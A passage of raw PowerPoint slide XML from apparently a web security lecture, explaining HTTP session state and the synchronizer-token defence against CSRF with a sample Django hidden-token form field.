                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB28FA50-8238-B248-BEAA-D6784F433A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="530225" y="839788"/>
            <a:ext cx="8537575" cy="693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400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP is stateless: when a client sends a request, the server sends back a response but the server does not hold any information on previous requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The problem:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>in most web applications a client has to access various pages before completing a specific task and the client state should be kept along all those pages. How does the server know if two requests come from the same browser?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> the server doesn’t require a user to log at each HTTP request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The idea:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>insert some token into the page when it is requested and get that token passed back with the next request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Two main approaches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to maintain a session between a web client and a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="713"/>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use hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="713"/>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use cookies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018A97C-D004-664A-8822-662110E31769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="76200"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="370826" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{560B116B-202B-DB41-9A8A-A280FDB10975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579438" y="1981200"/>
            <a:ext cx="8661400" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469876"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It is a technique where a token, secret and unique value for each request, is embedded by the web application in all HTML forms and verified on the server side. The token may be generated by any method that ensures unpredictability and uniqueness (e.g. using a hash chain of random seed). The attacker is thus unable to place a correct token in their requests to authenticate them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469876" indent="-457200" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" spc="5" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469876"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Example of STP set by Django in a HTML form:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{229B911C-A4F9-E240-9996-C70EAC8D259E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="1030288"/>
            <a:ext cx="5372100" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Synchronizer token pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91141" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD4D0621-1CF0-D542-B964-B2C2E5BB162B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1193800" y="5921375"/>
            <a:ext cx="7496175" cy="7080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a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input</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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"hidden"</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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"csrfmiddlewaretoken"</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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="20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4C08D68-9547-3444-BC73-DB194F7240E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="76200"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="370826" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD9FB60-55F5-4047-BA48-0A69BA9FBC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579438" y="1981200"/>
            <a:ext cx="8661400" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469876"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It is a technique where a token, secret and unique value for each request, is embedded by the web application in all HTML forms and verified on the server side. The token may be generated by any method that ensures unpredictability and uniqueness (e.g. using a hash chain of random seed). The attacker is thus unable to place a correct token in their requests to authenticate them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469876" indent="-457200" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" spc="5" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469876" indent="-457200" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example of STP set by Django in a HTML form:</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C76898B8-1B82-A444-8202-D2843FD54822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="1030288"/>
            <a:ext cx="5372100" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Synchronizer token pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93189" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12BEAF69-D7F7-3F4D-A317-FE8C6E9D54AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1193800" y="5921375"/>
            <a:ext cx="7496175" cy="7080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a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input</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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"hidden"</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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"csrfmiddlewaretoken"</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value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93190" name="Picture 2" descr="BLOG case-without-anticsrf-good">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A47D50-2BBA-C14B-ADBF-FF9E0514E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695450"/>
            <a:ext cx="8793162"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0F381F3-ED71-2747-83CD-4F6E6AB48EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="76200"/>
            <a:ext cx="8515350" cy="957263"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="370826" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>Defense: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-5" dirty="0"/>
              <a:t>Secret</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="-35" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6100" spc="15" dirty="0"/>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr sz="6100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95235" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA13629E-87A7-E746-86FD-4374DB738DAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="579438" y="1981200"/>
            <a:ext cx="8661400"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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>STP is the most compatible as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>As the token is unique and unpredictable, it also enforces proper sequence of events which raises usability problem (e.g. user opens multiple tabs). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>It can be relaxed by using per session CSRF token instead of per request CSRF token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DE126CE-D963-1B4D-89E3-18B12E645BF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="1030288"/>
            <a:ext cx="5372100" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Synchronizer token pattern</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95237" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A153A85F-ED21-934B-BDC3-09A313DA501F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1193800" y="6400800"/>
            <a:ext cx="7496175" cy="7080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000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input</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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"hidden"</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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"csrfmiddlewaretoken"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="7D9029"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
